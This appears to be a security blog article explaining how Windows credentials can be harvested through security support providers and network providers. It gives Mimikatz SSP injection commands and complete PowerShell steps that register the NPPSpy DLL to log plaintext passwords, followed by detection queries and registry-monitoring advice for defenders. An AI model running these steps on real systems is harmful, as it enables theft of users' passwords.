The security functions Additional LSA Protection and Credential Guard make it more difficult to extract credentials from memory. The passwords of domain users, for example, are encrypted with Credential Guard and there is no known direct attack against the virutalisation of the Local Security Authority Subsystem Service (LSASS) process. Only Microsoft-signed security modules are allowed to be loaded into the LSASS process with LSA Protection.

However, techniques exist to circumvent both security features. By manipulating the core system, Virtual Secure Mode (VSM) and thus Credential Guard can be disabled, and by loading signed kernel driver, LSA Protection can be deactivated in real time. These techniques harm the integrity of the system and leave obvious traces that can be detected. Are there other techniques to get credentials that have lower requirements and less impact on a systems integrity?

Windows Authentication Provider

User authentication is a core function of the operating system. The Windows Authentication Architecture contains multiple components that have access to credentials. When users authenticate themselves to the operating system, these components can further process the credentials. An often-used procedure is the caching of credentials in order to authenticate against other systems without users having to enter their usernames and passwords again.

Security Support Provider

The Security Support Providers (SSP) include Kerberos, NTLM (MSV1), TLS/SSL (Schannel) and Digest (WDigest). The Security Support Provider Interface (SSPI) provides support to easily load additional security modules. The registry key Security Packages must be extended by the name of the SSPs DLL for this purpose. The key is located under the path HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages.

The LSA Protection function can be used to restrict that only SSPs signed by Microsoft are allowed to be loaded – otherwise any DLL can be loaded into the LSASS process. For example, Mimikatz has with mimilib.dll an SSP that can be loaded with administrative rights:

mimikatz(commandline)# privilege::debug
Privilege '20' OK

mimikatz(commandline)# misc::memssp
Injected =)

Alternatively, the file mimilib.dll can be copied into the directory %WINDIR%\system32 and the Security Packages registry key must be expanded – if Mimikatz should not be executed on the target system. After the Mimikatz SSP has been loaded, credentials are written to mimilsa.log after a successful login.

Attacks against LSA and the use of SSPs have been practised for years, so most of the techniques are known, countermeasures are available, and various endpoint systems can detect the attack techniques.

Network Provider

A network provider is a DLL that provides support for specific network protocols. They use the Network Provider API to communicate with the operating system. A network provider can also be a credential manager. They receive a notification when a user logs in, or a password is changed.

Winlogon provides the graphical interface (GUI) and authentication functionality. Winlogon communicates with mpnotify via an RPC channel and communicates usernames and passwords. The mpnotify tool then distributes this information to the registered credential managers. These can be loaded via the registry in the same way as SSPs. The registry key ProviderOrder under the path HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order contains all network provider. The function NPLogonNotify is used to receive credentials as a credential manager.

NPPSpy

The security researcher Grzegorz Tworek had written an implementation of the NPLogonNotify function with NPPSpy two years ago in July 2020. NPPSpy stores the username and password of a login in plain text in a log file.

Use

The NPPSpy DLL is copied into the folder %WINDIR%\system32 with administrative rights. Afterwards, some registry keys must be set and NPPSpy must be registered as a network provider. This can be done with the following PowerShell commands:

$NetworkProviderName = "NPPSpy"

New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName"
New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider"
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "Class" -Value 2
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "Name" -Value $NetworkProviderName
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\$NetworkProviderName.dll"

$NetworkProviderPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name ProviderOrder
$NetworkProviderOrder = $NetworkProviderPath.ProviderOrder + ",$NetworkProviderName"
Set-ItemProperty -Path $NetworkProviderPath.PSPath -Name ProviderOrder -Value $NetworkProviderOrder

After that, NPPSpy is active and saves the credentials in the file C:\NPPSpy.txt every time someone logs in.

Countermeasures

The attack requires administrative rights because a DLL file is copied into the Windows system directory and registry entries are created/adjusted. If attacker obtain administrative rights, the attack cannot be prevented directly. Unlike the LSASS process, there are no hardening measures for network providers. The NPPSpy DLL may be detected by an endpoint solution.

To detect the attack, the registry key HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order\ProviderOrder should be monitored for changes. Furthermore, Services that are registered as Network Providers can be monitored. The query suggested in the article Network Logon Provider Registry Modification can be used for Elasticsearch, for example:

registry where registry.data.strings != null and registry.path : "HKL
M\\SYSTEM\\*ControlSet*\\Services\\*\\NetworkProvider\\ProviderPath"
and /* Excluding default NetworkProviders RDPNP, LanmanWorkstation
and webclient. */ not ( user.id : "S-1-5-18" and
registry.data.strings in
("%SystemRoot%\\System32\\ntlanman.dll",
"%SystemRoot%\\System32\\drprov.dll",
"%SystemRoot%\\System32\\davclnt.dll") )

In Grzegorz Tworek’s repository there is also the PowerShell script Get-NetworkProviders.ps1, which lists all registered network providers of a system. This is used to analyse the network providers and lists additional information about the respective DLL file, whether it was signed and by whom.

PS C:\> .\Get-NetworkProviders.ps1

Name        : RDPNP
DllPath     : C:\Windows\System32\drprov.dll
Signer      : CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version     : 10.0.19041.1 (WinBuild.160101.0800)
Description : Microsoft Remote Desktop Session Host Server Network Provider

Name        : LanmanWorkstation
DllPath     : C:\Windows\System32\ntlanman.dll
Signer      : CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version     : 10.0.19041.1 (WinBuild.160101.0800)
Description : Microsoft® Lan Manager

Name        : webclient
DllPath     : C:\Windows\System32\davclnt.dll
Signer      : CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version     : 10.0.19041.546 (WinBuild.160101.0800)
Description : Web DAV Client DLL

Name        : NPPSpy
DllPath     : C:\Windows\System32\NPPSPY.dll
Signer      :
Version     :
Description :

The network provider NPPSpy is suspicious in this case. Attackers can, of course, choose any name, but the missing signature is a suspect indicator.

Conclusion

Attacks against LSAs are widespread and consequently some hardening measures exist to make such attacks more difficult. The complexity and requirements for LSA attacks are constantly increasing. In addition, the extraction of LSA memory is detected and partially blocked by many endpoint solutions. In contrast, attacks using network providers are easy to implement and are much less monitored. Accordingly, defenders should implement suitable detection use cases for network providers. For attackers, network provider are an alternative to still extract credentials. In contrast to an LSA dump, however, attackers do not directly obtain credentials, but must access the log file again at a later time and hope that someone has logged into the system.

About the Author

Michael Schneider has been in IT since 2000. Since 2010 he is focused on information security. He is an expert at penetration testing, hardening and the detection of vulnerabilities in operating systems. He is well-known for a variety of tools written in PowerShell to find, exploit, and mitigate weaknesses. (ORCID 0000-0003-0772-9761)

Links

• https://docs.microsoft.com/en-us/windows-server/security/windows-authentication/windows-authentication-architecture
• https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify
• https://docs.microsoft.com/en-us/windows/win32/rpc/security-support-provider-interface-sspi-
• https://docs.microsoft.com/en-us/windows/win32/rpc/security-support-providers-ssps-
• https://docs.microsoft.com/en-us/windows/win32/secauthn/credential-manager
• https://docs.microsoft.com/en-us/windows/win32/secauthn/network-providers
• https://docs.microsoft.com/en-us/windows/win32/secauthn/winlogon
• https://github.com/gentilkiwi/mimikatz
• https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy/Get-NetworkProviders.ps1
• https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
• https://twitter.com/0gtweet
• https://www.elastic.co/guide/en/security/current/network-logon-provider-registry-modification.html